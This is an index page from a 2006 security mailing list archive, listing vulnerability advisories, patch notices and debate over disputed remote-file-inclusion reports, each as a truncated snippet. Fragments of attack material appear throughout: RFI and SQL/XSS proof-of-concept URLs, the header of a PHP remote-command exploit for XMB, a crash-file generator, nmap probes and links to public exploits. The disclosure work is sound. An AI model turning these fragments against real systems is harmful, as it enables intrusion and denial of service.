Re: phpPrintAnalyzer <= 1.1 (rep_par_rapport_racine) Remote File Inclusion Vulnerability

[EMAIL PROTECTED] schrieb am Mon, 7 Aug 2006 20:19:08 +: >-- > >Vulnerability: > >~ > >in index.php We Found Vulnerability Script > >--index.php-- > > > > >include($rep_par_rapp

[ MDKSA-2006:141 ] - Updated gnupg packages fix vulnerability

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:141 http://www.mandriva.com/security/ ___

[ MDKSA-2006:142 ] - Updated heartbeat packages fix vulnerability

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:142 http://www.mandriva.com/security/ ___

Re: Calendarix <= 0.7 (calpath) Remote File Inclusion Vulnerability

Carsten Eilers said: > Take a look at the top of cal_config.inc.php: > > # adjust the '$calpath'. > # hardcode it if detection does not work and comment out the remaining > # code. > # > # $calpath = "C:\\PHP\\calendarix\\demo\\" ; > > $calpath = dirname(__FILE__) ; When doing post-disclosure

Security contact from Critical Path Inc

Anyone knows how to reach them? thanks in advance, -Guillermo

Re: Re: myBloggie <= 2.1.3 (mybloggie_root_path) Remote File Inclusion Vulnerability

<<< We have same results in admin.php and db.php, Please dont post every include() function as a RFI vuln. Dont post such a messages for being famous. >>> SecurityFocus shouldn't approve . Please read these lines again again and again : <<< We have same results in admin.php and db.php, Plea

Re: RE: linksys WRT54g authentication bypass

I use WRT54g v4 (firmware v.4.20.8)and try to the following command. But I didn't exploit my router. When I captured the normal packet with ethereal, I only saw "POST /apply.cgi ." When I captured the exploit packet with curl, I didn't receive a reply packet according to the exploit reques

Re: TSRT-06-02: Microsoft SRV.SYS Mailslot Ring0 Memory Corruption Vulnerability

There's still an unpatched DOS for the server service as blogged on the MSRC blog: Also - an additional point of clarification - its important to distinguish that while MS06-040 addresses a vulnerability in the Server Servi

Opera 9 Remote Denial of Service

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 http://www.milw0rm.com/exploits/2179 Run the above as a server and connect to it using the in-built IRC client. The Linux, Windows and OSX versions are vulnerable and others may also be. By embedding a redirect to irc://evilhost in a web page the bro

Multiple Arbitrary File Access (Write/Read) Vulnerabilities

NGSSoftware Insight Security Research Advisory Name: Multiple Arbitrary File Access (Write/Read) Vulnerabilities Systems Affected: All version of Informix Severity: High Vendor URL: http://www.ibm.com/ Author: David Litchfield [ [EMAIL PROTECTED] ] Date of Public Advisory: 2nd August 2006 Advisor

RE: linksys WRT54g authentication bypass

Use a different Firmware then... Preferably, Sveasoft or DD-WRT The Sveasoft firmware is a replacement firmware upgrade for ASUS, Belkin, Buffalotech, and Linksys wireless routers. :D Sincerely, TeamXMM Internet Security & Consulting, Inc. Email: [EMAIL PROTECTED] Web http://www.teamxmm

[ GLSA 200608-20 ] Ruby on Rails: Several vulnerabilities

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200608-20 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - -

Joomla Webring Component (component_dir) Remote File Inclusion Vulnerabilities

# # # C Y BE R - W A R R i O R T I M # # # Joomla Webring Component (co

Multiple Buffer Overflow Vulnerabilities in Informix

NGSSoftware Insight Security Research Advisory Name: Multiple Buffer Overflow Vulnerabilities in Informix Systems Affected: All versions of Informix Severity: High Vendor URL: http://www.ibm.com/ Author: David Litchfield [ [EMAIL PROTECTED] ] Date of Public Advisory: 2nd August 2006 Advisory numb

(somewhat) breaking the same-origin policy by undermining dns-pinning

Hello list, A small contribution to the current "hacking the intranet with JavaScript" meme (also posted to my blog at http://shampoo.antville.org/stories/1451301/). == Introduction = J. Grossman, RSnake, SPI Dynamics, pdp and others have demonstrated lately that it is possible for a malicious

[Overflow.pl] ImageMagick ReadSGIImage() Heap Overflow

Overflow.pl Security Advisory #7 ImageMagick ReadSGIImage() Heap Overflow Vendor: ImageMagick (http://www.imagemagick.org) Affected version: 6.x up to and including 6.2.8 Vendor status: Fixed version released (6.2.9) Author: Damian Put <[EMAIL PROTECTED]> URL: http://www.overflow.pl/adv/imsgihea

Multiple buffer-overflows in libmusicbrainz 2.1.2

### Luigi Auriemma Application: libmusicbrainz http://musicbrainz.org/doc/libmusicbrainz Versions: <= 2.1.2 and <= SVN 8406 (current SVN) Platforms:Windows, *nix, *BSD, Mac and

Peoplebook Mambo Component <= v1.0 Remote File Include Vulnerabilities

--- Peoplebook Mambo Component <= v1.0 Remote File Include Vulnerabilities --- Author : Matdhule Date: August, 14th 2006 Locatio

Re: Startpage <= 1.0 (cfgLanguage) Remote File Inclusion Vulnerability

HE ... Security FOCUS Moderators please don't add ! cfgLanguage is defined in config.php : $cfgLanguage= 'uk'; how can you change $cfgLanguage when it is defined ? Another Fake BUG Like Mafia Moblog Vulnerability : MAFIA MoBlog BID : 19458 MAFIA : http://securityfocus.com/bid/19458

RE: ANNOUNCING: 3rd Annual US OWASP AppSec Conference - Oct 16-18 2006 - Seattle, WA

Many more details for the OWASP conference have been settled and are now available on the OWASP site, including: 1) Most of the agenda is set: See: http://www.owasp.org/index.php/OWASP_AppSec_Seattle_2006/Agenda 2) Conference hotel discounts have been negotiated and I'd strongly recommend making

osDate 1.1.8 - Multiple HTML Injection Vulnerability - fixed

Hi, The bug as reported in thread 19034 is fixed in the version osDate 1.1.8. Thanks Vijay

Re: Re: TSRT-06-02: Microsoft SRV.SYS Mailslot Ring0 Memory Corruption Vulnerability

i can confirm for windows xp, fully patched... initially i tried this from http://www.security.nnov.ru/files/mswinmailslotex.c same exploit, but from a different site. but i think it exploits the same, or very similar vulnerability to MS06-040.

Multiple Password Exposures Flaws

NGSSoftware Insight Security Research Advisory Name: Multiple Password Exposures Flaws Systems Affected: All versions of Informix Severity: High Vendor URL: http://www.ibm.com/ Author: David Litchfield [ [EMAIL PROTECTED] ] Date of Public Advisory: 2nd August 2006 Advisory number: #NISR02082006E

Local privilege Escalation in SmartLine DeviceLock 5.73

The vulnerability constitutes of wrong ACLs on Device Object permission set by the driver. Whenever your ACLs on a harddrive or partition, as configured by DeviceLock Manager, only consists of Allow entries (and Deny being the default), then the driver sets the ACLs on the kernel's internal ob

Unauthorized Database Creation Privilege on Informix

NGSSoftware Insight Security Research Advisory Name: Unauthorized Database Creation Privilege on Informix Systems Affected: 9.40.xC6 and earlier and 10.00.xC2, C1 Severity: High Vendor URL: http://www.ibm.com/ Author: David Litchfield [ [EMAIL PROTECTED] ] Date of Public Advisory: 2nd August 2006

Technical note: under some conditions, it's possible to steal HTTP credentials using Flash

Technical note: under some conditions, it's possible to steal HTTP credentials using Flash (requires IE + some transparent proxies or virtual hosting) The method described here is pretty simple. It works though only on HTTP (not HTTPS) credentials. Also, it works only when the client browses (u

Re: [SM-ANNOUNCE] SquirrelMail 1.4.8 released - fixes variable overwriting attack

Hello, On Fri, 11 Aug 2006, Yves Goergen wrote: > I can't apply the patch, the patch command asks me for the files and > says it cannot find the header of a unified diff. Can anybody tell me > how to use this patch? Usually, it works but not this time. You just have to remove the first lines of t

InfanView 3.98 (with plugins) - Access violation at processing images CUR files

Example (in Delphi): ===cur.dpr=== program cur; {$APPTYPE CONSOLE} const FileName='file.cur'; Len=6; Buf=#$00#$00#$01#$00#$00#$00; var F:File; begin AssignFile(F,FileName); Rewrite(F,1); BlockWrite(F,Buf,Len); CloseFile(F); end. =

Multiple Arbitrary Command Execution Vulnerabilities

NGSSoftware Insight Security Research Advisory Name: Multiple Arbitrary Command Execution Vulnerabilities Systems Affected: All versions of Informix Severity: High Vendor URL: http://www.ibm.com/ Author: David Litchfield [ [EMAIL PROTECTED] ] Date of Public Advisory: 2nd August 2006 Advisory numb

Arbitrary Library Loading in Informix

NGSSoftware Insight Security Research Advisory Name: Arbitrary Library Loading in Informix Systems Affected: All versions of Informix Severity: High Vendor URL: http://www.ibm.com/ Author: David Litchfield [ [EMAIL PROTECTED] ] Date of Public Advisory: 2nd August 2006 Advisory number: #NISR020820

Wordpress WP-DB Backup Plugin Directory Traversal Vulnerability

Hi all, Software: WP-DB Backup Plugin for Wordpress Homepage: http://www.skippy.net/blog/category/wordpress/plugins/wp-db-backup/ Description: WP-DB Backup is vulnerable to directory traversal attack. You must have administrator rights in the wordpress blog to exploit this vulnerability. PoC:

Kaspersky Anti-Hacker personal firewall unstealthy stealth mode

Kaspersky personal firewall 1.8.180 in "stealth mode" configuration doesnt detect nor block timestamp and network block ICMP request. They still call it a stealth mode feature, yeah sure ;) Try: nmap -sP -PE namp -sP -PM

HPSBMA02138 SSRT061184 rev.1 - HP OpenView Storage Data Protector, Remote Arbitrary Command Execution

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c00742778 Version: 1 HPSBMA02138 SSRT061184 rev.1 - HP OpenView Storage Data Protector, Remote Arbitrary Command Execution NOTICE: The information in this Security Bulletin should be acted upon

Re: Startpage <= 1.0 (cfgLanguage) Remote File Inclusion Vulnerability

[EMAIL PROTECTED] schrieb am Thu, 10 Aug 2006 20:53:46 +: >Sanitize Variabel $cfgLanguage in edit.php , functions.php , new.php , >PageBottom.php > >& PageTop.php Take a look at config.php: $cfgLanguage= 'uk'; // Which language do you prefer :

RE: Re: Cisco VPN Concentrator IKE resource exhaustion DoS Advisory

In reviewing the "fine print" of the Cisco response, their recommendations fall in the category of a workaround, since the underlying "vulnerability" is really a flaw in the IKE protocol. Fix the protocol and you can fix the "vulnerability". But that would require that every vendor who uses IKE t

JavaScript get Internal Address (thanks to DanBUK)

http://www.gnucitizen.org/projects/javascript-address-info http://f-box.org/~dan/jstest.html The following technique was brought to me by DanBUK (http://f-box.org/~dan/). Dan managed to find the internal IP address of the visiting client by establishing a socket between local host and the remote

Re: [SM-ANNOUNCE] SquirrelMail 1.4.8 released - fixes variable overwriting attack

Go in the base dir of your SM install, patch -p0 < patch_file.patch On Friday 11 August 2006 06:23, Yves Goergen wrote: > On 11.08.2006 14:26 CE(S)T, Thijs Kinkhorst wrote: > > The patches can be found here: > > http://www.squirrelmail.org/patches/sqm1.4.7-expired-post-fix-minimal.pat > >ch > > ht

Virtual War v1.5.0 SQL injection and XSS

Virtual War v1.5.0 SQL injection and XSS http://[host]/vwar/war.php?s=[SQL] http://[host]/vwar/war.php?page=[SQL]or[xss] http://[host]/vwar/war.php?showgame=[SQL] http://[host]/vwar/war.php?sortby=[sql] http://[host]/vwar/war.php?sortorder=[sql] http://host]/vwar/calendar.php?year=[xss] ve

BlaBla 4U XSS Vulnerabilite

BlaBla 4U XSS Vulnerabilite vendor : http://www.blabla4u.com http://www.Host.com/trial.php?product=[XSS] http://www.Host.com/[patch]/ForumsII.asp?ForumID=[XSS] Discovered by Vampire connect me :[EMAIL PROTECTED]

Re: Yabb XSS - or NOT

On 10 Aug 2006 04:13:34 - [EMAIL PROTECTED] wrote: > ### Software: YaBB > > #Attack method: Cross Site Scripting > #

XMB <= 1.9.6 Final basename()/'langfilenew' arbitrary local inclusion / remote commands execution

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\n";; echo "dork: \"Powered by XMB\"\n\n"; /* works regardless of php.ini settings */ if ($argc<6) { echo "Usage: php ".$argv[0]." host path username password cmd OPTIONS\n"; echo "host: target server (ip/hostname)\

SQLIDEBUG envariable overflow on Informix

NGSSoftware Insight Security Research Advisory Name: SQLIDEBUG envariable overflow on Informix Systems Affected: 9.40.xC6 and earlier and 10.00.xC2, C1 Severity: High Vendor URL: http://www.ibm.com/ Author: David Litchfield [ [EMAIL PROTECTED] ] Date of Public Advisory: 2nd August 2006 Advisory n

Google Picasa Listening on Port 80?

I'm using Picasa 2.5 Beta (32.43), and I notice from Sysinternals' TCPVIEW app that it is listening on port 80. So I fire up the browser, and sure enough, http://localhost returns a blank page. When I close Picasa, the browser returns "The page cannot be displayed". What a great idea, a user-mode

Re: miniBloggie <= 1.0 (fname) Remote File Inclusion Vulnerability

[EMAIL PROTECTED] schrieb am Thu, 10 Aug 2006 20:38:38 +: >PoC: > >~~~ > >http://www.target.com/[miniBloggie]/cls_fast_template.php?fname=[Evil Script] Now you have your evil script included in a function. But how would you call the function, to execute your script? Regards Carsten -- Di

RE: [Full-disclosure] RE: when will AV vendors fix this???

On Mon, 7 Aug 2006, Thomas D. wrote: > And even if you hide the file, if it hide the way you describe, you aren't > able to execute the file, until you give access to yourself. If you do this, > the anti-virus program will also have access > > > Keep in mind: If it is an unknown file (zero-d

[ECHO_ADV_45$2006] WEBinsta CMS 0.3.1 (templates_dir) Remote File Inclusion Vulnerability

ECHO_ADV_45$2006 - [ECHO_ADV_45$2006] WEBinsta CMS 0.3.1 (templates_dir) Remote File Inclusion Vulnerability - Autho

Re: Mafia Moblog <= 6 (pathtotemplate) Remote File Inclusion Vulnerability

(please remove this bid : 19458) Mafia Moblog isn't vulnerable. why ?! Exploit of Mafia is here : http://www.example.com/[Mafia Moblog]/big.php?pathtotemplate=[Evil Script] in big.php we have : but $pathtotemplate was defined already in template.php see this line: include("template.php");

Re: Calendarix <= 0.7 (calpath) Remote File Inclusion Vulnerability

[EMAIL PROTECTED] schrieb am Sat, 12 Aug 2006 09:59:20 +: > >Solution: > > > >Sanitize Variabel $calpath in cal_config.inc.php > >- Take a look at the top of cal_config.inc.php: # adjust the '$calpath'. # hardcode it if detection does not work and

Re: myEvent <= 1.4 Multiple Remote File Include Vulnerabilities

[EMAIL PROTECTED] schrieb am Sat, 12 Aug 2006 10:03:15 +: >-admin.php-- > > > > >include_once($language); > >?> > >... Take a look at config.php: $language = "lang_eng.php"; an at admin.php: -event.php

Error logging buffer overflow in Informix

NGSSoftware Insight Security Research Advisory Name: Error logging buffer overflow in Informix Systems Affected: Informix 9.40.xC7 and xC8, 10.00.xC3 and xC4 Severity: Critical Vendor URL: http://www.ibm.com/ Author: David Litchfield [ [EMAIL PROTECTED] ] Date of Public Advisory: 2nd August 2006

Informix Long Username Buffer Overflow Vulnerability

NGSSoftware Insight Security Research Advisory Name: Informix Long Username Buffer Overflow Vulnerability Systems Affected: Informix 9.40.xC6 and earlier, 10.00.xC2 and earlier Severity: Critical Vendor URL: http://www.ibm.com/ Author: David Litchfield [ [EMAIL PROTECTED] ] Date of Public Advisor

Informix - Discovery, Attack and Defense

Hey all, I've just posted "Informix - Discovery, Attack and Defense" to databasesecurity.com. For those that would like a copy you can download it from http://www.databasesecurity.com/informix-securing.htm. This paper is derived from Chapter 11 from the Database Hacker's Handbook. The issues discus

Re: TSRT-06-02: Microsoft SRV.SYS Mailslot Ring0 Memory Corruption Vulnerability

After furiously patching since last week for catching up with MS06-040, we discovered that a old exploit for MS06-035 (again or still) works on a number fully patched systems including Windows 2003 Server, Windows XP and Windows 2000. The exploit that works is: http://milw0rm.org/exploits/2057